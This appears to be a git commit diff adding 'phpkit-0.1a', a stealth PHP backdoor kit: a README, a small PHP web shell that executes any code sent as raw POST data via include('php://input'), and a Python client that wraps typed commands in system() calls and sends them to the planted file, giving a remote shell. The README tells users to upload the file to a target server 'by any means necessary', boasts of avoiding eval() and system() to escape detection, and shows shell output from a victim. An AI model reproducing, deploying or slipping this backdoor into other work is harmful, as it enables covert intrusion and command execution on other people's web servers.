update

php shell and jsp shell

php/phpkit-0.1a/README

@@ -0,0 +1,53 @@
+ /$$$$$$$  /$$   /$$ /$$$$$$$  /$$       /$$   /$$    
+| $$__  $$| $$  | $$| $$__  $$| $$      |__/  | $$    
+| $$  \ $$| $$  | $$| $$  \ $$| $$   /$$ /$$ /$$$$$$  
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$  /$$/| $$|_  $$_/  
+| $$____/ | $$__  $$| $$____/ | $$$$$$/ | $$  | $$    
+| $$      | $$  | $$| $$      | $$_  $$ | $$  | $$ /$$
+| $$      | $$  | $$| $$      | $$ \  $$| $$  |  $$$$/
+|__/      |__/  |__/|__/      |__/  \__/|__/   \____/
+
+phpkit-0.1a
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP 
+code you happen to write. The example client, phpkit.py, simply
+gives a "shell prompt" (non interactive, each command is executed
+in a new "context") on the victim server. It is trivial to write
+pretty much anything, I have also written "upload.py" which will
+be ready for the next release, which allows uploading arbritary 
+files to the infected webserver.
+
+USAGE:
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkit.py <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php 
+
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+shell:~$
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence. 

php/phpkit-0.1a/odd.php

@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>

php/phpkit-0.1a/phpkit.py

@@ -0,0 +1,28 @@
+#!/usr/bin/python
+# Client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twitter: @info_dox
+# Insecurety Research - 2013
+import requests
+import sys
+
+if (len(sys.argv) != 2):
+    print "Usage: " + sys.argv[0] + " <url of backdoor>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php"
+    sys.exit(0)
+
+url = sys.argv[1]
+print "\n[+] URL in use: %s \n" %(url)
+while True:
+    cmd = raw_input("shell:~$ ")
+    if cmd == "quit":
+        print "\n[-] Quitting"
+        sys.exit(0)
+    elif cmd == "exit":
+        print "\n[-] Quitting"
+        sys.exit(0)
+    else:
+        payload = """<?php system('%s'); ?>""" %(cmd)
+        hax = requests.post(url, payload)
+        print hax.text